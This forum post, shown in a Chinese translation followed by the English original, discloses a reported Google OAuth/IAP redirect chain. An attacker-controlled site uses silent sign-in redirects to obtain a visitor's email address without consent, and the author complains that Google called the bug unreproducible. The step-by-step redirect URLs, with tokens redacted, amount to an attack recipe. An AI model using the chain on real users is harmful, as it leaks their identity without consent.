谷歌修复了WithPersona的个人身份信息泄露问题,但随后声称该问题“无法重现”。
在二月份,我向谷歌的漏洞奖励团队报告了以下内容:
1) 用户访问 https://attacker.tld(这可以是故意的,也可以是通过弹出窗口访问的)。
2) attacker.tld 通过状态码 302/301 将用户重定向到 OAuth 端点。
2.1) 重定向 1: https://accounts.google.com/o/oauth2/v2/auth? client_id=[client-id] &response_type=code &scope=openid email &redirect_uri=https://iap.googleapis.com/v1/oauth/clientIds/[client-id]:handleRedirect &code_challenge=[已编辑] &code_challenge_method=S256 &cred_ref=true &state=[已编辑]
2.2) 重定向 2: https://iap.googleapis.com/v1/oauth/clientIds/[client-id]:handleRedirect? state=[已编辑] &code=[已编辑] &scope=email openid https://www.googleapis.com/auth/userinfo.email &authuser=0 &prompt=none
2.3) 重定向 3: https://attacker.tld/?gcp-iap-mode=AUTHENTICATING &redirect_token_v2=[已编辑]
3) 用户的电子邮件地址在 2.3 的结果中直接在 HTTP 401 响应中以 attacker.tld 域名的形式提供。因此,我们知道用户的电子邮件地址在未获得同意的情况下被共享。
由于没有收到回复,我以为该问题仍在处理中。几周后,我再次回到他们的门户网站进行确认。他们已经回复,但仅在他们的门户内。工单来回沟通,声称无法重现该问题。最后,我向他们提供了 https://withpersona-gov.com 的实时 URL。
他们再次辩称该漏洞无法重现。巧合的是,在我提供 URL 后仅两天,该网站就更改为重定向到主要的 withpersona 域名。
显然,这将是或仍然是对隐私法的重大侵犯。我感到自己在这里被误导了。
查看原文
In Feb. I reported this to Google's Bug Bounty team:<p>1)User visits https://attacker.tld (this can be intentional or via a pop-under)<p>2) attacker.tld redirects users via status code 302/301 to the oauth endpoints<p>2.1) redirect 1: https://accounts.google.com/o/oauth2/v2/auth? client_id=[client-id] &response_type=code &scope=openid email &redirect_uri=https://iap.googleapis.com/v1/oauth/clientIds/[client-id]:handleRedirect &code_challenge=[redacted] &code_challenge_method=S256 &cred_ref=true &state=[redacted]<p>2.2) redirect 2: https://iap.googleapis.com/v1/oauth/clientIds/[client-id]:handleRedirect? state=[redacted] &code=[redacted] &scope=email openid https://www.googleapis.com/auth/userinfo.email &authuser=0 &prompt=none<p>2.3) redirect 3: https://attacker.tld/ ?gcp-iap-mode=AUTHENTICATING &redirect_token_v2=[redacted]<p>3) The user's email address is served directly in the HTTP 401 response as a result of 2.3, on the attacker.tld domain name. From this we know that the user's email address has been shared without consent.<p>Not having received a response, I assumed it was pending. Weeks later I went back to their portal to double check. They had responded, but only within their portal. The ticket went back and forth, claiming that it wasn't reproducible. Finally, I provided them with the live URL at https://withpersona-gov.com.<p>Once again they argued that the bug wasn't reproducible. Conveniently, the site had changed to redirect to the main withpersona domain, just 2 days after I provided them with the URL.<p>Obviously this would have been or still is a massive violation of privacy laws. I feel that I've been gaslit here.